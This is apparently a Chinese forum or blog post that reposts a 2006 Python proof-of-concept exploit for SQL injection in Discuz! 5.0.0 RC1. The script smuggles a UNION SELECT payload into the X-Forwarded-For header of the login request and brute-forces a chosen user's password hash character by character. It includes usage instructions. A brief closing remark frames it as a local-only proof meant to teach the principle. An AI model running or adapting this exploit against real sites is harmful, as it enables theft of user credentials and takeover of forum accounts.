关于Discuz! 5.0.0 RC1的PoC
这里把网上公布的code也贴出来:
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006
import sys
import httplib
from urlparse import urlparse
from time import sleep
def injection (lenthofpass, realurl, path):
sys.stdout.write('[+] The uid=' + sys.argv[2] + ' password hash is: ')
for num in range(1,lenthofpass+1):
ran = range(97, 123)
for a in range(48, 58): ran.append(a)
for i in ran:
query = '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST", path + "logging.php?action=login&",data , header)
#sleep(1)
response = http.getresponse()
re1 = response.read()
if re1.find('SELECT') == -1:
print '\n[-] Unvulnerable host'
print '[-] Exit..'
sys.exit(1);
elif re1.find('ip3') == -1:
sys.stdout.write(chr(i))
http.close()
#sleep(1)
break
#print re1
#print '-----------------------------------------------'
http.close()
#sleep(1)
sys.stdout.write('\n')
def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'
if len(sys.argv) == 3:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)
lenth = 32
print '[+] Connect %s' % url[1]
print '[+] Trying'
print '[+] Plz wait a long long time'
injection(lenth, url, u)
print '[+] Finished'
if __name__ == '__main__': main()
btw: 我一直认为,0day不是最重要的,重要的是懂得其理
我写的这个Code就像PoC的字面意思一样,只不过是个证明而已.所以也没必要写成最优代码.这个code我只本地测试过.远程测试不成功是很正常的.当然,如果懂了原理,写个能用的exploit还是很方便的.否则连为什么不成功都不清不楚,也只有郁闷着了.